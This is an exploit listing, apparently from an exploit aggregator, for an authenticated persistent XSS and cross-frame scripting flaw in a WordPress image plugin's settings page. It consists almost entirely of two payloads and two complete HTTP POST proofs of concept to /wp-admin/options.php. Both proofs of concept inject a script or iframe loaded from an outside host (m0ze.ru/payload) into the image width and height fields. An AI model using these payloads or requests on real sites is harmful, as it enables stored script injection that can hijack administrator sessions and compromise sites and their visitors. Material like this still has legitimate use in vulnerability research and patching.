Share
## https://sploitus.com/exploit?id=WPEX-ID:AE79189A-6B63-4110-9567-CD7C97D71E4F
### -- [ Payloads: ]
[$] "><script src=//m0ze.ru/payload/a.js></script><div x
[$] "><iframe src=https://m0ze.ru/payload/xfsii.html></iframe><div x
### -- [ PoC #1 | Authenticated Persistent XSS & XFS | Max Image Upload Width: ]
[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 361
option_page=instant-img-setting-group&action=update&_wpnonce=84d90e991d&_wp_http_referer=%2Fwp-admin%2Fupload.php%3Fpage%3Dinstant-images&instant_img_settings%5Bunsplash_download_w%5D=%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&instant_img_settings%5Bunsplash_download_h%5D=1337&instant_img_settings%5Bmedia_modal_display%5D=0
### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Max Image Upload Height: ]
[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 375
option_page=instant-img-setting-group&action=update&_wpnonce=84d90e991d&_wp_http_referer=%2Fwp-admin%2Fupload.php%3Fpage%3Dinstant-images&instant_img_settings%5Bunsplash_download_w%5D=1337&instant_img_settings%5Bunsplash_download_h%5D=%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E%3Cdiv+x&instant_img_settings%5Bmedia_modal_display%5D=0